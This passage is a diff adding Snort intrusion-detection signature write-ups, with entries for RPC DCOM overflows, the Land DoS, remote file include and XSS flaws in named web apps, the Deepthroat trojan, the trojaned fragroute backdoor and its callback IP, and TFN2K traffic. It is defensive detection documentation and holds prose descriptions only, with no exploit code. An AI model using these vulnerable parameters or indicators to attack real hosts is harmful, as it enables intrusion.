+If the Windows registry is accessible via SMB the attacker can
+manipulate the operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1848.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1848
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3224.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3224
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2755.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2755
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_unique_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/523.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid: 523
+
+--
+Summary:
+This event is generated when packets on the network have the reserved 
+bit set.
+
+--
+Impact:
+Possible prelude to system compromise.
+
+--
+Detailed Information:
+Under normal circumstances IP packets do not use the reserved bit.
+
+This may be an indicator of the use of the reserved bit by a malicious 
+user to instigate covert channel communications.
+
+an indicator of unauthorized network use, reconnaisance activity or 
+system compromise. These rules may also generate an event due to 
+improperly configured network devices.
+
+--
+Affected Systems:
+	All
+
+--
+Attack Scenarios:
+The attacker may send specially crafted packets with the reserved bit 
+set.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Use a packet filtering device to reject packets with this bit set.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/269.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+269
+
+--
+Summary:
+A denial of service attack known as Land has been launched. Some TCP/IP 
+stacks crash or hang when sent a spoofed TCP SYN packet with the same 
+source and destination host and the same source and destination port.  
+
+--
+Impact:
+Denial of service against a target host.
+
+--
+Detailed Information:
+The Land denial of service attack attempts to crash or disable a target 
+host by sending a spoofed TCP SYN packet with an identical source and 
+destination IP and identical source and destination port.  Some target 
+hosts will crash others will be temporarily disabled.  
+
+--
+Affected Systems:
+	Windows 95
+	Windows NT Any unpatched version 
+	SCO CMW+ 3.0
+	SCO Open Desktop/Open Server 3.0
+	SCO Open Server 5.0
+	SCO UnixWare 2.1.0
+	Gauntlet 3.2/HP-UX 10.10 and Gauntlet 4.1/HP-UX 10.20
+
+--
+Attack Scenarios:
+A malicious user crafts a packet to cause a Denial of Service against a 
+target host.
+
+--
+Ease of Attack:
+Simple to craft such a packet using any number of packet crafting tools 
+such as nmap and hping.
+
+
+--
+False Positives:
+None known.  This should have a very low likelihood of false positives.
+
+--
+False Negatives:
+The exploit code has an IP identification number and TCP sequence number
+of 3868.  If a user changes the source code to have a different IP 
+identification or TCP sequence number, the rule will not fire. 
+
+--
+Corrective Action:
+Malicious outside attacks can be prevented by configuring your 
+packet-filtering device to block packets from entering your network that
+have source IP's from your network address space. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+CAN-1999-0016
+
+CERT:
+CA-1997-28
+
+--
--- /dev/null
+++ b/doc/signatures/3412.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3412
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000587.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000587
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_backup.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_backup.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1172.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1172
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1025.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1025
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+This event indicates that an attempt has been made to access
+/scripts/perl on a web server. This may indicate that an attacker is
+attempting to run code of their choosing on that server.
+
+Perl should not be installed in a directory directly accessible via the
+Internet on a web server.
+
+--
+Affected Systems:
+	Any host using IIS with Active Perl installed.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+Access to a webserver that stores web cgi scripts in /scripts/perl/ will
+generate events.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1980.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1980
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/535.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+535
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2322.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2322
+
+--
+Summary:
+This event is generated when an attempt is made to access foxweb.dll, a 
+component of the FoxWeb CGI web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+The FoxWeb application is used to communicate with FoxPro databases. The
+program foxweb.exe contains an error that may allow an attacker to
+execute arbitrary code of their choosing and possibly gain unauthorized
+administrator access to the server.
+
+--
+Affected Systems:
+	FoxWeb 2.5 and prior
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator by supplying input of
+their choosing to the CGI program.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1925.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1925
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all exported file systems and to indicate which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+
+--
--- /dev/null
+++ b/doc/signatures/1791.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+1791
+
+--
+Summary:
+This event indicates that a backdoor may be installed on a machine.
+
+--
+Impact:
+One of the systems may have been compromised.
+
+--
+Detailed Information:
+www.monkey.org, the system that hosts fragroute was compromised and the fragroute
+source code was modified to contain a back door.  The code was corrupted on 
+May 17, 2002.  Versions after May 31, 2002  and before May 17, 2002 do not contain the backdoor.
+
+--
+Affected Systems:
+
+Systems running
+	dsniff 2.3
+	fragroute 1.2
+	fragrouter 1.6
+
+--
+Attack Scenarios:
+The backdoor contacts the IP address 216.80.99.202.  A person connecting from that
+address can use the backdoor to acquire full control over the compromised machine.  
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+While the IP address flagged in this rule was associated with the backdoor at the time
+fragroute was trojaned, it may now or in the future be used by unrelated parties.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a new version of fragroute and sanitize the trojaned machine.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4898
+http://www.securityfocus.com/archive/1/274927
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1640.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1640
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
--- /dev/null
+++ b/doc/signatures/2233.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2233
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
--- /dev/null
+++ b/doc/signatures/100000568.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000568
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Qdig" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "post_gallery" parameter in the "index.php" 
+script used by the "Qdig" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Qdig
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/413.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+413
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 Where-Are-You datagram.
+
+--
+
+Impact:
+ICMP Type 33 datagrams are not expected network traffic.  Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 33 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000425.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DotWidget CMS" application running on a webserver. Access to the file "printfriendly.php" using a remote file being passed as the "file_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "file_path" parameter in the "printfriendly.php" script used by the "DotWidget CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DotWidget CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1650.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1650
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/222.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+222
+
+--
+Summary:
+This event is generated when ICMP traffic is sent between Tribe Flood Network 2000 (TFN2K) hosts.
+
+--
+Impact:
+Attempted DDoS. It is possible there is a TFN2K host in your network. 
+
+--
+Detailed Information:
+When TFN2K hosts communicate using ICMP, they may use an ICMP echo reply with an ICMP identification number of 0 and with a sequence of A's in the payload.  The tell-tale sequence of A's is a problem with the Base 64 encoding that was employed.   
+
+--
+Affected Systems:
+Any TFN2K infected host. 
+
+--
+Attack Scenarios:
+TFN2K hosts communicate with each other for various reasons for the ultimate purpose of attacking a target.
+
+--
+Ease of Attack:
+Simple. TFN2K is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS425
+
+--
--- /dev/null
+++ b/doc/signatures/1662.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+1662
+--
+Summary:
+This event is generated when an attempt is made to access the home directory of the ftp user via http.
+
+--
+Impact:
+Medium - Possible unauthorized file access due a configuration error
+
+--
+Detailed Information:
+The FTP server might block access on ftp homedir to (anonymous) users, 
+but the folder can be read using the webserver.
+
+Apache UserDir module allows sharing home directory (sub-)folders, a 
+misconfiguration of the webserver or ftp user account may allow 
+unauthorized access to the ftp user directory.
+
+--
+Attack Scenarios:
